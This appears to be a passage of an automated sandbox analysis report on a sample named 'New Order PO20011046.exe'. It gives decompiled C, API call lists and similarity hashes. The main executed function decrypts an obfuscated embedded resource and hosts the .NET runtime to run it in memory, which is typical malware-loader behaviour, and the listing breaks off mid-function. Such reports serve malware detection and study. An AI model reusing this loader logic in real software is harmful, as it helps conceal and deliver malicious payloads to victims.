                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 730355536-0
                                                                                                            • Opcode ID: 600912231cdc3beefa95f37ca8cc673541f5d76b5046a5f57e2448582748c0d3
                                                                                                            • Instruction ID: 0c8c3061e8bc301fa40f353c49d9af44eca2c0ae05e39e207cd3d085ce9af6e8
                                                                                                            • Opcode Fuzzy Hash: 600912231cdc3beefa95f37ca8cc673541f5d76b5046a5f57e2448582748c0d3
                                                                                                            • Instruction Fuzzy Hash: C11179B0904280AFE715EB95D840F19BBE9EF54310F648E7BE8059B6A1D73C5D418B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048253C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 55%
                                                                                                            			E5048253C(signed int* __eax) {
				char _v8;
				signed int* _v12;
				signed int* _v16;
				signed int* _v20;
				void* __ebp;
				signed int _t54;
				signed int* _t56;
				char _t57;
				signed int* _t60;
				signed int _t75;
				signed int* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int* _t92;
				void* _t94;
				void* _t96;
				intOrPtr _t97;

				_t94 = _t96;
				_t97 = _t96 + 0xfffffff0;
				_t81 = __eax;
				 *0x504955c0 = 0;
				if( *0x504955bc != 0 || E50481B34() != 0) {
					_push(_t94);
					_push(E50482703);
					_push( *[fs:edx]);
					 *[fs:edx] = _t97;
					__eflags =  *0x50495045;
					if( *0x50495045 != 0) {
						_push(0x504955c4);
						L50481314();
					}
					_v12 = _t81;
					_v12 = _v12 - 4;
					_t82 =  *_v12;
					__eflags = _t82 & 0x00000002;
					if((_t82 & 0x00000002) != 0) {
						 *0x504955ac =  *0x504955ac - 1;
						 *0x504955b0 =  *0x504955b0 - (_t82 & 0x7ffffffc) - 4;
						__eflags = _t82 & 0x00000001;
						if((_t82 & 0x00000001) == 0) {
							L14:
							_t83 = _t82 & 0x7ffffffc;
							_v16 = _v12 + _t83;
							__eflags = _v16 -  *0x50495618; // 0x0
							if(__eflags != 0) {
								_t54 =  *_v16;
								__eflags = _t54 & 0x00000002;
								if((_t54 & 0x00000002) == 0) {
									_v20 = _v16;
									_t56 = _v20;
									__eflags =  *(_t56 + 4);
									if( *(_t56 + 4) == 0) {
										L25:
										 *0x504955c0 = 0xb;
									} else {
										__eflags =  *_v20;
										if( *_v20 == 0) {
											goto L25;
										} else {
											_t60 = _v20;
											__eflags =  *((intOrPtr*)(_t60 + 8)) - 0xc;
											if( *((intOrPtr*)(_t60 + 8)) >= 0xc) {
												__eflags = _t83;
												E50481D0C(_v20);
												goto L27;
											} else {
												goto L25;
											}
										}
									}
								} else {
									__eflags = (_t54 & 0x7ffffffc) - 4;
									if((_t54 & 0x7ffffffc) >= 4) {
										 *_v16 =  *_v16 | 0x00000001;
										L27:
										E50481FE0(_v12, _t83);
									} else {
										 *0x504955c0 = 0xb;
									}
								}
								goto L28;
							} else {
								 *0x50495618 =  *0x50495618 - _t83;
								 *0x50495614 =  *0x50495614 + _t83;
								__eflags =  *0x50495614 - 0x3c00;
								if( *0x50495614 > 0x3c00) {
									E504820D8(_t52);
								}
								_v8 = 0;
								E50483CB8();
								goto L32;
							}
						} else {
							_t11 = _v12 - 0xc + 8; // 0xfffffd0d
							_t75 =  *_t11;
							__eflags = _t75 - 0xc;
							if(_t75 < 0xc) {
								L10:
								 *0x504955c0 = 0xa;
								goto L28;
							} else {
								__eflags = _t75 & 0x80000003;
								if((_t75 & 0x80000003) == 0) {
									_v20 = _v12 - _t75;
									_t92 = _v20;
									__eflags = _t75 -  *((intOrPtr*)(_t92 + 8));
									if(_t75 ==  *((intOrPtr*)(_t92 + 8))) {
										_t82 = _t82 + _t75;
										__eflags = _t82;
										_v12 = _v20;
										E50481D0C(_v20);
										goto L14;
									} else {
										 *0x504955c0 = 0xa;
										goto L28;
									}
								} else {
									goto L10;
								}
							}
						}
					} else {
						 *0x504955c0 = 9;
						L28:
						_t57 =  *0x504955c0; // 0x0
						_v8 = _t57;
						__eflags = 0;
						_pop(_t88);
						 *[fs:eax] = _t88;
						_push(E5048270A);
						__eflags =  *0x50495045;
						if( *0x50495045 != 0) {
							_push(0x504955c4);
							L5048131C();
							return 0;
						}
						return 0;
					}
				} else {
					 *0x504955c0 = 8;
					_v8 = 8;
					L32:
					_t41 =  &_v8; // 0x50482138
					return  *_t41;
				}
			}





















                                                                                                            0x5048253d
                                                                                                            0x5048253f
                                                                                                            0x50482543
                                                                                                            0x50482547
                                                                                                            0x50482553
                                                                                                            0x50482576
                                                                                                            0x50482577
                                                                                                            0x5048257c
                                                                                                            0x5048257f
                                                                                                            0x50482582
                                                                                                            0x50482589
                                                                                                            0x5048258b
                                                                                                            0x50482590
                                                                                                            0x50482590
                                                                                                            0x50482595
                                                                                                            0x5048259e
                                                                                                            0x504825a4
                                                                                                            0x504825a6
                                                                                                            0x504825a9
                                                                                                            0x504825ba
                                                                                                            0x504825ca
                                                                                                            0x504825d0
                                                                                                            0x504825d3
                                                                                                            0x50482628
                                                                                                            0x50482628
                                                                                                            0x50482633
                                                                                                            0x50482639
                                                                                                            0x5048263f
                                                                                                            0x50482670
                                                                                                            0x50482672
                                                                                                            0x50482674
                                                                                                            0x50482697
                                                                                                            0x5048269a
                                                                                                            0x5048269d
                                                                                                            0x504826a1
                                                                                                            0x504826b4
                                                                                                            0x504826b4
                                                                                                            0x504826a3
                                                                                                            0x504826a6
                                                                                                            0x504826a9
                                                                                                            0x00000000
                                                                                                            0x504826ab
                                                                                                            0x504826ab
                                                                                                            0x504826ae
                                                                                                            0x504826b2
                                                                                                            0x504826c6
                                                                                                            0x504826cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x504826b2
                                                                                                            0x504826a9
                                                                                                            0x50482676
                                                                                                            0x5048267b
                                                                                                            0x5048267e
                                                                                                            0x5048268f
                                                                                                            0x504826d0
                                                                                                            0x504826d5
                                                                                                            0x50482680
                                                                                                            0x50482680
                                                                                                            0x50482680
                                                                                                            0x5048267e
                                                                                                            0x00000000
                                                                                                            0x50482641
                                                                                                            0x50482641
                                                                                                            0x50482647
                                                                                                            0x5048264d
                                                                                                            0x50482657
                                                                                                            0x50482659
                                                                                                            0x50482659
                                                                                                            0x50482660
                                                                                                            0x50482663
                                                                                                            0x00000000
                                                                                                            0x50482663
                                                                                                            0x504825d5
                                                                                                            0x504825db
                                                                                                            0x504825db
                                                                                                            0x504825de
                                                                                                            0x504825e1
                                                                                                            0x504825ea
                                                                                                            0x504825ea
                                                                                                            0x00000000
                                                                                                            0x504825e3
                                                                                                            0x504825e3
                                                                                                            0x504825e8
                                                                                                            0x504825fe
                                                                                                            0x50482601
                                                                                                            0x50482604
                                                                                                            0x50482607
                                                                                                            0x50482618
                                                                                                            0x50482618
                                                                                                            0x5048261d
                                                                                                            0x50482623
                                                                                                            0x00000000
                                                                                                            0x50482609
                                                                                                            0x50482609
                                                                                                            0x00000000
                                                                                                            0x50482609
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x504825e8
                                                                                                            0x504825e1
                                                                                                            0x504825ab
                                                                                                            0x504825ab
                                                                                                            0x504826da
                                                                                                            0x504826da
                                                                                                            0x504826df
                                                                                                            0x504826e2
                                                                                                            0x504826e4
                                                                                                            0x504826e7
                                                                                                            0x504826ea
                                                                                                            0x504826ef
                                                                                                            0x504826f6
                                                                                                            0x504826f8
                                                                                                            0x504826fd
                                                                                                            0x00000000
                                                                                                            0x504826fd
                                                                                                            0x50482702
                                                                                                            0x50482702
                                                                                                            0x5048255e
                                                                                                            0x5048255e
                                                                                                            0x50482568
                                                                                                            0x5048270a
                                                                                                            0x5048270a
                                                                                                            0x50482711
                                                                                                            0x50482711

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(504955C4,00000000,50482703,?,?), ref: 50482590
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(504955C4,5048270A,?), ref: 504826FD
                                                                                                              • Part of subcall function 50481B34: RtlInitializeCriticalSection.KERNEL32(504955C4,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481B4B
                                                                                                              • Part of subcall function 50481B34: RtlEnterCriticalSection.KERNEL32(504955C4,504955C4,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481B5E
                                                                                                              • Part of subcall function 50481B34: LocalAlloc.KERNEL32(00000000,00000FF8,504955C4,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481B88
                                                                                                              • Part of subcall function 50481B34: RtlLeaveCriticalSection.KERNEL32(504955C4,50481C03,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481BF6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                            • String ID: 8!HP
                                                                                                            • API String ID: 2227675388-2124396412
                                                                                                            • Opcode ID: 3c4f85ace816300555135f72ce3b8d4dff1c8361d1c72c8adf2f25c3daba6af0
                                                                                                            • Instruction ID: b930474fbd7fcfae9a169df2b54ed2d79e3892cdc71918395acea3e5270ab5bc
                                                                                                            • Opcode Fuzzy Hash: 3c4f85ace816300555135f72ce3b8d4dff1c8361d1c72c8adf2f25c3daba6af0
                                                                                                            • Instruction Fuzzy Hash: 1D515770A00248EFDB10DFA8DA84B9DB7F1FF15314F644E6AE414E72A1E378A984CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50488D74, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E50488D74(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x50488e52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E50484278(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E50484310( &_v8, 0x50488e74);
				} else {
					E50484310( &_v8, 0x50488e68);
				}
				_t32 = E50484714(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E504844E8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E5048476C( *_t49, E50484514( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E50488E59);
				return E50484278( &_v8);
			}













                                                                                                            0x50488d81
                                                                                                            0x50488d84
                                                                                                            0x50488d86
                                                                                                            0x50488d8a
                                                                                                            0x50488d8b
                                                                                                            0x50488d90
                                                                                                            0x50488d93
                                                                                                            0x50488d98
                                                                                                            0x50488da4
                                                                                                            0x50488daf
                                                                                                            0x50488dba
                                                                                                            0x50488dc1
                                                                                                            0x50488dda
                                                                                                            0x50488dc3
                                                                                                            0x50488dcb
                                                                                                            0x50488dcb
                                                                                                            0x50488dee
                                                                                                            0x50488e07
                                                                                                            0x50488e16
                                                                                                            0x50488e1c
                                                                                                            0x50488e37
                                                                                                            0x50488e37
                                                                                                            0x50488e1c
                                                                                                            0x50488e3e
                                                                                                            0x50488e41
                                                                                                            0x50488e44
                                                                                                            0x50488e51

                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50488E52), ref: 50488DFA
                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50488E52), ref: 50488E00
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                            • String ID: yyyy
                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                            • Opcode ID: b896c35e2b6b7dd2bbb8d99c40c1f3f7c5344b7f17484b306e52c08b1498a571
                                                                                                            • Instruction ID: cce9e368d18ecebf8827706312b28e2f288ec9ff329f864539d60368c7c20376
                                                                                                            • Opcode Fuzzy Hash: b896c35e2b6b7dd2bbb8d99c40c1f3f7c5344b7f17484b306e52c08b1498a571
                                                                                                            • Instruction Fuzzy Hash: 84215338605108AFDB01DB98C841AEEB3B8EF59744F514A6AFD05D7351E7389E00C7A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: New Order PO20011046.exe PID: 1256 Parent PID: 7048 New Order PO20011046.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 00401980, Relevance: 163.5, APIs: 39, Strings: 54, Instructions: 778comprocessCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00401980(void* __edx, void* __eflags) {
				char _v528;
				char _v532;
				void* _v556;
				void* _v560;
				void* _v564;
				char _v816;
				char _v820;
				char _v840;
				intOrPtr _v844;
				char _v852;
				char _v876;
				char _v916;
				char _v948;
				char _v980;
				char _v984;
				char _v1012;
				char _v1016;
				char _v1048;
				intOrPtr _v1052;
				void* _v1056;
				char _v1057;
				char _v1058;
				char _v1059;
				char _v1060;
				char _v1061;
				char _v1062;
				char _v1063;
				char _v1064;
				char _v1065;
				char _v1066;
				char _v1067;
				char _v1068;
				char _v1069;
				char _v1070;
				char _v1071;
				char _v1072;
				char _v1073;
				char _v1074;
				char _v1075;
				char _v1076;
				char _v1077;
				char _v1078;
				char _v1079;
				void* _v1080;
				char _v1081;
				char _v1082;
				char _v1083;
				char _v1084;
				char _v1085;
				char _v1086;
				char _v1087;
				char _v1088;
				char _v1092;
				char _v1096;
				CHAR* _v1100;
				struct HRSRC__* _v1104;
				signed int _v1108;
				int _v1112;
				int _v1116;
				signed int _v1120;
				CHAR* _v1124;
				char _v1125;
				char _v1126;
				char _v1127;
				char _v1128;
				char _v1129;
				char _v1130;
				char _v1131;
				char _v1132;
				char _v1133;
				char _v1134;
				char _v1135;
				void* _v1136;
				char _v1137;
				char _v1138;
				char _v1139;
				int _v1140;
				char _v1141;
				char _v1142;
				char _v1143;
				void* _v1144;
				char _v1145;
				char _v1146;
				char _v1147;
				void* _v1148;
				char _v1149;
				char _v1150;
				char _v1151;
				char _v1152;
				char _v1153;
				char _v1154;
				char _v1155;
				char _v1156;
				char _v1157;
				char _v1158;
				char _v1159;
				char _v1160;
				char _v1161;
				char _v1162;
				char _v1163;
				char _v1164;
				char _v1168;
				intOrPtr* _v1176;
				char _v1180;
				char _v1188;
				intOrPtr* _v1192;
				intOrPtr* _v1212;
				intOrPtr* _v1248;
				intOrPtr* _v1260;
				intOrPtr* _v1264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t338;
				void* _t341;
				int _t342;
				intOrPtr* _t350;
				int _t351;
				long _t353;
				signed int _t355;
				intOrPtr* _t359;
				long _t360;
				struct HINSTANCE__* _t366;
				CHAR* _t367;
				int _t370;
				intOrPtr _t371;
				int _t372;
				intOrPtr* _t373;
				void* _t380;
				intOrPtr* _t383;
				intOrPtr* _t384;
				intOrPtr* _t387;
				intOrPtr* _t388;
				int _t389;
				intOrPtr* _t393;
				intOrPtr* _t397;
				intOrPtr* _t398;
				long _t401;
				intOrPtr _t402;
				intOrPtr _t403;
				long _t409;
				intOrPtr _t410;
				intOrPtr _t411;
				intOrPtr* _t419;
				int _t421;
				int _t422;
				intOrPtr* _t423;
				intOrPtr* _t426;
				void* _t433;
				int _t434;
				int _t436;
				intOrPtr* _t440;
				int _t442;
				int _t445;
				int _t447;
				int _t448;
				int _t450;
				CHAR* _t452;
				char _t453;
				intOrPtr* _t455;
				intOrPtr* _t457;
				signed int _t462;
				intOrPtr* _t476;
				intOrPtr _t496;
				intOrPtr* _t497;
				intOrPtr* _t499;
				intOrPtr* _t501;
				intOrPtr _t502;
				void* _t503;
				struct HRSRC__* _t506;
				int _t517;
				intOrPtr* _t528;
				int _t530;
				int _t532;
				int _t534;
				int _t535;
				int _t536;
				int _t537;
				void* _t538;
				struct HRSRC__* _t539;
				intOrPtr* _t540;
				void* _t542;
				void* _t543;
				void* _t544;
				void* _t545;
				intOrPtr* _t546;
				intOrPtr* _t547;
				void* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				intOrPtr* _t551;
				struct HINSTANCE__* _t552;
				void* _t553;
				void* _t560;
				void* _t562;
				void* _t566;
				void* _t567;
				intOrPtr* _t568;
				void* _t570;
				void* _t571;
				void* _t572;

				_t572 = __eflags;
				_t503 = __edx;
				__imp__OleInitialize(0); // executed
				_v1156 = 0xe0;
				_v1155 = 0x3b;
				_v1154 = 0x8d;
				_v1153 = 0x2a;
				_v1152 = 0xa2;
				_v1151 = 0x2a;
				_v1150 = 0x2a;
				_v1149 = 0x41;
				_v1148 = 0xd3;
				_v1147 = 0x20;
				_v1146 = 0x64;
				_v1145 = 6;
				_v1144 = 0x8a;
				_v1143 = 0xf7;
				_v1142 = 0x3d;
				_v1141 = 0x9d;
				_v1140 = 0xd9;
				_v1139 = 0xee;
				_v1138 = 0x15;
				_v1137 = 0x68;
				_v1136 = 0xf4;
				_v1135 = 0x76;
				_v1134 = 0xb9;
				_v1133 = 0x34;
				_v1132 = 0xbf;
				_v1131 = 0x1e;
				_v1130 = 0xe7;
				_v1129 = 0x78;
				_v1128 = 0x98;
				_v1127 = 0xe9;
				_v1126 = 0x6f;
				_v1125 = 0xb4;
				_v1124 = 0;
				_push(E00401650( &_v1156,  &_v876));
				_t338 = E0040B95E(0xd3, _t503, _t538, _t543, _t572);
				_t560 =  &_v1152 + 0xc;
				if(_t338 == "0x1") {
					L102:
					__eflags = 0;
					return 0;
				} else {
					_t341 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t544 = _t341;
					_v556 = 0x224;
					_v1088 = 0xce;
					_v1087 = 0x27;
					_v1086 = 0x9c;
					_v1085 = 0x1a;
					_v1084 = 0x95;
					_v1083 = 0x2e;
					_v1082 = 0x22;
					_v1081 = 0x57;
					_v1080 = 0x91;
					_v1079 = 0x21;
					_v1078 = 0x57;
					_v1077 = 0x3a;
					_v1076 = 0xf8;
					_v1075 = 0x98;
					_v1074 = 0x5b;
					_v1073 = 0xf4;
					_v1072 = 0xb5;
					_v1071 = 0x87;
					_v1070 = 0x7b;
					_v1069 = 0xf;
					_v1068 = 0xf4;
					_v1067 = 0x76;
					_v1066 = 0xb9;
					_v1065 = 0x34;
					_v1064 = 0xbf;
					_v1063 = 0x1e;
					_v1062 = 0xe7;
					_v1061 = 0x78;
					_v1060 = 0x98;
					_v1059 = 0xe9;
					_v1058 = 0x6f;
					_v1057 = 0xb4;
					_v1056 = 0;
					_v1160 = 0xc0;
					_v1159 = 0x38;
					_v1158 = 0x8d;
					_v1157 = 0x1f;
					_v1156 = 0x8e;
					_v1155 = 0x30;
					_v1154 = 0x65;
					_v1153 = 0x47;
					_v1152 = 0xd3;
					_v1151 = 0x29;
					_v1150 = 0x3b;
					_v1149 = 0x56;
					_v1148 = 0xf8;
					_v1147 = 0x98;
					_v1146 = 0x5b;
					_v1145 = 0xf4;
					_v1144 = 0xb5;
					_v1143 = 0x87;
					_v1142 = 0x7b;
					_v1141 = 0xf;
					_v1140 = 0xf4;
					_v1139 = 0x76;
					_v1138 = 0xb9;
					_v1137 = 0x34;
					_v1136 = 0xbf;
					_v1135 = 0x1e;
					_v1134 = 0xe7;
					_v1133 = 0x78;
					_v1132 = 0x98;
					_v1131 = 0xe9;
					_v1130 = 0x6f;
					_v1129 = 0xb4;
					_v1128 = 0;
					_t342 = Module32First(_t544,  &_v556); // executed
					if(_t342 == 0) {
						L38:
						FindCloseChangeNotification(_t544); // executed
						_t552 = GetModuleHandleA(0);
						_v1164 = 0xfc;
						_v1163 = 0xb;
						_v1162 = 0xff;
						_v1161 = 0x75;
						_v1160 = 0xe7;
						_v1159 = 0x44;
						_v1158 = 0x4b;
						_v1157 = 0x23;
						_v1156 = 0xbf;
						_v1155 = 0x45;
						_v1154 = 0x3b;
						_v1153 = 0x56;
						_v1152 = 0xf8;
						_v1151 = 0x98;
						_v1150 = 0x5b;
						_v1149 = 0xf4;
						_v1148 = 0xb5;
						_v1147 = 0x87;
						_v1146 = 0x7b;
						_v1145 = 0xf;
						_v1144 = 0xf4;
						_v1143 = 0x76;
						_v1142 = 0xb9;
						_v1141 = 0x34;
						_v1140 = 0xbf;
						_v1139 = 0x1e;
						_v1138 = 0xe7;
						_v1137 = 0x78;
						_v1136 = 0x98;
						_v1135 = 0xe9;
						_v1134 = 0x6f;
						_v1133 = 0xb4;
						_v1132 = 0;
						_t539 = FindResourceA(_t552, E00401650( &_v1164,  &_v852), 0xa);
						_v1104 = _t539;
						_t545 = LoadResource(_t552, _t539);
						_t452 = LockResource(_t545);
						_t350 = E0040B80D(_t452,  &_v1164, _t539, SizeofResource(_t552, _t539)); // executed
						_push(0x40022);
						_t540 = _t350; // executed
						_t351 = E0040AF26(_t452, _t540, __eflags); // executed
						_t562 = _t560 + 0x10;
						_v1100 = _t351;
						__eflags = _t351;
						if(_t351 == 0) {
							_v1124 = 0;
						} else {
							E0040B9F0(_t540, _t351, 0, 0x40022);
							_t562 = _t562 + 0xc;
							_v1124 = _v1100;
						}
						E00401300(_v1124);
						_t506 = _v1104;
						_t353 = SizeofResource(_t552, _t506);
						_v1120 = _t353;
						asm("cdq");
						_t507 = _t506 & 0x000003ff;
						_t355 = _t353 + (_t506 & 0x000003ff) >> 0xa;
						__eflags = _t355;
						if(_t355 > 0) {
							_v1100 = _t452;
							_v1052 = _t540 - _t452;
							_v1108 = _t355;
							do {
								_t436 = _v1100;
								_push(_v1052 + _t436);
								_push(0x400);
								_push(_t436);
								E00401560(_t452, _v1124);
								_v1112 = _v1112 + 0x400;
								_t177 =  &_v1120;
								 *_t177 = _v1120 - 1;
								__eflags =  *_t177;
							} while ( *_t177 != 0);
						}
						_t462 = _v1120 & 0x800003ff;
						__eflags = _t462;
						if(_t462 < 0) {
							_t462 = (_t462 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t462;
						}
						__eflags = _t462;
						if(_t462 > 0) {
							_t433 = _v1120 - _t462;
							_t507 = _t433 + _t540;
							_push(_t433 + _t540);
							_push(_t462);
							_t434 = _t433 + _t452;
							__eflags = _t434;
							_push(_t434);
							E00401560(_t452, _v1124);
						}
						E0040B9F0(_t540, _t452, 0, _v1120);
						FreeResource(_t545);
						_t453 =  *_t540;
						_v1048 = _t453;
						_t359 = E0040B80D(_t453, _t507, _t540, _t453); // executed
						_t546 = _t359;
						_t360 = SizeofResource(_t552, _v1104);
						_t186 = _t540 + 4; // 0x4
						E0040AC10(_t546,  &_v1048, _t186, _t360);
						E0040B9F0(_t540, _t540, 0, _v1120);
						_t191 = _t546 + 0xe; // 0xe
						_t553 = _t191;
						_v1164 = 0xce;
						_v1163 = 0x27;
						_v1162 = 0x9c;
						_v1161 = 0x1a;
						_v1160 = 0x95;
						_v1159 = 0x21;
						_v1158 = 0x2e;
						_v1157 = 0xd;
						_v1156 = 0xdb;
						_v1155 = 0x29;
						_v1154 = 0x57;
						_v1153 = 0x56;
						_v1152 = 0xf8;
						_v1151 = 0x98;
						_v1150 = 0x5b;
						_v1149 = 0xf4;
						_v1148 = 0xb5;
						_v1147 = 0x87;
						_v1146 = 0x7b;
						_v1145 = 0xf;
						_v1144 = 0xf4;
						_v1143 = 0x76;
						_v1142 = 0xb9;
						_v1141 = 0x34;
						_v1140 = 0xbf;
						_v1139 = 0x1e;
						_v1138 = 0xe7;
						_v1137 = 0x78;
						_v1136 = 0x98;
						_v1135 = 0xe9;
						_v1134 = 0x6f;
						_v1133 = 0xb4;
						_v1132 = 0;
						_t366 = LoadLibraryA(E00401650( &_v1164,  &_v916));
						_v1164 = 0xe0;
						_v1163 = 0x18;
						_v1162 = 0xad;
						_v1161 = 0x36;
						_v1160 = 0x95;
						_v1159 = 0x21;
						_v1158 = 0x2a;
						_v1157 = 0x57;
						_v1156 = 0xda;
						_v1155 = 0xc;
						_v1154 = 0x55;
						_v1153 = 0x25;
						_v1152 = 0x8c;
						_v1151 = 0xf9;
						_v1150 = 0x35;
						_v1149 = 0x97;
						_v1148 = 0xd0;
						_v1147 = 0x87;
						_v1146 = 0x7b;
						_v1145 = 0xf;
						_v1144 = 0xf4;
						_v1143 = 0x76;
						_v1142 = 0xb9;
						_v1141 = 0x34;
						_v1140 = 0xbf;
						_v1139 = 0x1e;
						_v1138 = 0xe7;
						_v1137 = 0x78;
						_v1136 = 0x98;
						_v1135 = 0xe9;
						_v1134 = 0x6f;
						_v1133 = 0xb4;
						_v1132 = 0;
						_t367 = E00401650( &_v1164,  &_v948);
						_t566 = _t562 + 0x3c;
						 *0x423480 = GetProcAddress(_t366, _t367);
						_t542 = 0;
						_v1056 = 0;
						_v1112 = 0;
						_v1116 = 0;
						_v1125 = 0;
						_v820 =  &_v816;
						_t370 = E004018D0( &_v816,  &_v820,  &_v1164, _t546, 3);
						_push( &_v1064);
						_push(0x41b230);
						_push(0x41b220);
						_push(0);
						_push(L"wks");
						_push(L"v2.0.50727"); // executed
						L0040AD3E(); // executed
						__eflags = _t370;
						if(_t370 < 0) {
							_t542 = 0;
							__eflags = 0;
							goto L58;
						} else {
							_t419 = _v1080;
							_t421 =  *((intOrPtr*)( *((intOrPtr*)( *_t419 + 0x28))))(_t419); // executed
							__eflags = _t421;
							if(_t421 < 0) {
								L58:
								_v1149 = 1;
							} else {
								_t422 = _v1140;
								__eflags = _t422;
								if(_t422 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t422 + 8))))(_t422);
								}
								_t423 = _v1084;
								_v1140 = _t542;
								 *((intOrPtr*)( *((intOrPtr*)( *_t423 + 0x34))))(_t423,  &_v1140); // executed
								_t546 = _v1148;
								__eflags = _t546 - _t542;
								if(_t546 == _t542) {
									E0040AD50(0x80004003);
								}
								_t426 = _v1152;
								__eflags = _t426 - _t542;
								if(_t426 != _t542) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t426 + 8))))(_t426);
								}
								_v1152 = _t542;
								 *((intOrPtr*)( *((intOrPtr*)( *_t546))))(_t546, 0x41b270,  &_v1152);
							}
						}
						_t371 = _v844;
						__eflags = _t371 -  &_v840;
						if(__eflags != 0) {
							_push(_t371);
							E0040B675(_t453, _t542, _t546, __eflags);
							_t566 = _t566 + 4;
						}
						__eflags = _v1149;
						if(_v1149 == 0) {
							_v1148 = _t542;
							E00401870( &_v1132, _t553, "_._");
							_t547 = __imp__#8;
							_v1148 = _t542;
							 *_t547( &_v1072);
							E00401870( &_v1084, _t553, "___");
							_t380 =  *_t547( &_v1064);
							_t454 = _t453 + 0xfffffff2;
							_v1140 = _t453 + 0xfffffff2;
							_v1136 = _t542;
							__imp__#15(0x11, 1,  &_v1140); // executed
							_t548 = _t380;
							_v1156 = _t542;
							__imp__#23(_t548,  &_v1156);
							E0040B310(_t453 + 0xfffffff2, _t542, _t548, _v1164, _t553, _t454);
							_t567 = _t566 + 0xc;
							__imp__#24(_t548);
							_t383 = _v1180;
							__eflags = _t383 - _t542;
							if(_t383 == _t542) {
								_t383 = E0040AD50(0x80004003);
							}
							_t455 = _t383;
							_t384 = _v1180;
							__eflags = _t384 - _t542;
							if(_t384 != _t542) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t384 + 8))))(_t384);
							}
							_v1180 = _t542;
							 *((intOrPtr*)( *((intOrPtr*)( *_t455 + 0xb4))))(_t455, _t548,  &_v1180); // executed
							__eflags = _t548 - _t542;
							if(_t548 != _t542) {
								__imp__#16(_t548);
							}
							_t549 = _v1192;
							__eflags = _t549 - _t542;
							if(_t549 == _t542) {
								E0040AD50(0x80004003);
							}
							_t387 = _v1188;
							__eflags = _t387 - _t542;
							if(_t387 != _t542) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t387 + 8))))(_t387);
							}
							_t388 = _v1176;
							_v1188 = _t542;
							__eflags = _t388 - _t542;
							if(_t388 == _t542) {
								_t389 = 0;
								__eflags = 0;
							} else {
								_t389 =  *_t388;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_t549 + 0x44))))(_t549, _t389,  &_v1188); // executed
							__imp__#411(0xc, _t542, _t542);
							_t476 = _v1212;
							__eflags = _t476 - _t542;
							if(_t476 == _t542) {
								E0040AD50(0x80004003);
							}
							_t550 = _v1144;
							__eflags = _t550 - _t542;
							if(_t550 == _t542) {
								_t517 = 0;
								__eflags = 0;
							} else {
								_t517 =  *_t550;
							}
							_t568 = _t567 - 0x10;
							_t393 = _t568;
							 *_t393 = _v1136;
							 *((intOrPtr*)(_t393 + 4)) = _v1132;
							 *((intOrPtr*)(_t393 + 8)) = _v1128;
							 *(_t393 + 0xc) = _v1124;
							 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 0xe4))))(_t476, _t517, 0x118, _t542, _t542,  &_v1120);
